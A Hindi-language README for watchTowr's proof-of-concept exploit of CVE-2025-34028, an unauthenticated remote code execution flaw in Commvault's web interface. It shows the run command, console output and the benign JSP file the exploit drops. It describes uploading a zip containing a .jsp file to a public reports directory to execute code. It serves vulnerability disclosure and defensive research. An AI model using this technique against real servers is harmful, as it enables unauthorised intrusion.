
कॉमवॉल्ट पूर्व-प्रमाणित रिमोट कोड निष्पादन प्रूफ ऑफ कॉन्सेप्ट
तकनीकी विवरण के लिए हमारा ब्लॉग पोस्ट देखें
python watchtowr-vs-commvault-rce-CVE-2025-34028.py --url https://192.168.1.1
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchtowr-vs-commvault-rce-CVE-2025-34028.py
(*) Commvault Unauthenticated Remote Code Execution (CVE-2025-34028) POC by watchTowr
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2025-34028]
[*] Targeting https://192.168.1.1
[*] Verifying presence of Commvault
[*] Uploading to /reports/MetricsUpload/2GfMIJdK/
[*] Fetching System User from https://192.168.1.1/reports/MetricsUpload/2GfMIJdK/.tmp/dist-cc/dist-cc/shell.jsp
[*] System User EC2XXX-XXXXXXX$
यह स्क्रिप्ट Commvault वेब इंटरफेस के लिए CVE-2025-34028 का प्रूफ ऑफ कॉन्सेप्ट है। कोड निष्पादन .jsp फ़ाइल वाली एक ज़िप फ़ाइल अपलोड करके, ज़िप फ़ाइल एक सार्वजनिक निर्देशिका में अपलोड की जाती है और प्रतिक्रिया में सिस्टम उपयोगकर्ता का विवरण दिया जाता है। अधिक विवरण हमारे [ब्लॉग पोस्ट] (https://labs.watchtowr.com/) में वर्णित हैं।
PoC स्क्रिप्ट एक हार्डकोडेड ज़िप फ़ाइल का उपयोग करती है जिसमें निम्नलिखित फ़ाइलें होती हैं:
Shell.jsp सामग्री:
<%@ page import="java.util.*" %>
<html>
<body>
<h3>System Information</h3>
<p>Current User: <%= System.getProperty("user.name") %></p>
</body>
</html>
अधिक विवरण के लिए Commvault Advisory देखें
नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम का अनुसरण करें